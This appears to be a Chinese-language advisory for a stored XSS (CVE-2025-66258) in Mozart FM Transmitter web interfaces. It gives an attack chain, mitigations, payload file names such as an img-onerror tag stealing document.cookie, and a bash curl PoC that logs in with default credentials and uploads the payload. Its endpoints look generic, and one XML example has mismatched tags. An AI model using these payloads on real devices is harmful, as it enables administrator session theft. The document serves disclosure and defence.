CVE-2025-66258: DB Electronica Mozart FM Transmitter存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-66258

漏洞类型

存储型跨站脚本攻击(Stored XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter (versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000)

漏洞概述

CVE-2025-66258是DB Electronica Telecomunicazioni S.p.A.生产的Mozart FM Transmitter设备中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞源于系统对用户上传的文件名缺乏有效的输入验证和输出编码。攻击者可以通过构造包含恶意JavaScript代码的文件名（如<img src=x onerror=alert()>.bin），将其注入到patchlist.xml文件中。当ajax.js处理并渲染该XML文件时，恶意脚本会在受害者浏览器中执行。由于是存储型XSS，恶意代码会持久保存在服务器端，所有访问该页面的用户都会受到攻击影响。此漏洞需要攻击者具备低权限账户并诱导用户进行交互操作，CVSS评分5.4，属于中等严重程度。攻击成功可导致会话劫持、敏感信息窃取、恶意内容注入等危害。

技术细节

漏洞存在于Mozart FM Transmitter的Web管理界面文件上传功能中。具体来说，当用户上传固件文件或配置文件时，系统直接将用户提供的文件名拼接到patchlist.xml文件中，未进行任何HTML实体编码或输入验证。攻击者可以利用文件上传接口上传名为<img src=x onerror=alert(document.cookie)>.bin的恶意文件。服务器端会将此文件名直接写入XML文件，形成<file><img src=x onerror=alert(document.cookie)>.bin</filename></file>的结构。当管理员通过Web界面查看固件列表时，ajax.js会解析并渲染该XML内容，触发onerror事件执行任意JavaScript代码。由于patchlist.xml被设计为动态加载，任何访问固件管理页面的用户都会触发恶意脚本，导致存储型XSS攻击成功。攻击者可利用此漏洞窃取管理员Cookie、进行钓鱼攻击或执行其他恶意操作。

攻击链分析

STEP 1

步骤1

攻击者登录Mozart FM Transmitter Web管理界面，获取有效会话

STEP 2

步骤2

攻击者通过文件上传功能上传包含恶意JavaScript代码的文件名（如<img src=x onerror=alert()>.bin）

STEP 3

步骤3

服务器将未经过滤的用户输入直接写入patchlist.xml文件，形成存储型XSS payload

STEP 4

步骤4

管理员或普通用户访问固件管理页面，ajax.js加载并解析patchlist.xml

STEP 5

步骤5

浏览器渲染XML内容时触发onerror事件，执行攻击者注入的JavaScript代码

STEP 6

步骤6

攻击者成功窃取用户Cookie、会话令牌或其他敏感信息，或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash # CVE-2025-66258 PoC - Stored XSS in Mozart FM Transmitter # Affected: DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter TARGET="http://target-ip:8080" USERNAME="admin" PASSWORD="admin" # Generate malicious filename MALICIOUS_FILENAME='<img src=x onerror=alert("XSS")>.bin' # Step 1: Login to the web interface echo "[*] Logging in to Mozart FM Transmitter..." SESSION=$(curl -s -c cookies.txt -d "username=$USERNAME&password=$PASSWORD" "$TARGET/login" | grep -oP 'session=\K[^ ]+') # Step 2: Upload file with malicious filename echo "[*] Uploading file with malicious filename..." curl -s -b cookies.txt -X POST \ -F "[email protected];filename=$MALICIOUS_FILENAME" \ "$TARGET/upload" # Step 3: Trigger XSS by accessing patchlist.xml echo "[*] Triggering XSS via patchlist.xml..." curl -s -b cookies.txt "$TARGET/patchlist.xml" | grep "onerror" echo "[+] XSS payload injected successfully" echo "[+] Visit $TARGET/patchlist.xml in a browser to trigger the alert"

影响范围

Mozart FM Transmitter version 30

Mozart FM Transmitter version 50

Mozart FM Transmitter version 100

Mozart FM Transmitter version 300

Mozart FM Transmitter version 500

Mozart FM Transmitter version 1000

Mozart FM Transmitter version 2000

Mozart FM Transmitter version 3000

Mozart FM Transmitter version 3500

Mozart FM Transmitter version 6000

Mozart FM Transmitter version 7000

防御指南

临时缓解措施

在厂商发布官方修复补丁前，可采取以下临时缓解措施：1) 限制文件上传功能的访问权限，仅允许受信任的管理员使用；2) 在Web应用层部署WAF规则，过滤包含<script>、<img>、<iframe>等HTML标签的文件名；3) 禁用或限制ajax.js对patchlist.xml的自动解析和渲染功能；4) 对管理界面实施严格的会话管理和多因素认证；5) 定期检查服务器日志，监控异常的文件上传行为；6) 考虑使用独立的文件存储服务，避免用户输入直接写入XML配置文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66258
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66258
3 Details https://www.cvedetails.com/cve/CVE-2025-66258/
4 VulDB https://vuldb.com/cve/CVE-2025-66258
5 Link https://www.abdulmhsblog.com/posts/webfmvulns/
6 Link https://www.abdulmhsblog.com/posts/webfmvulns/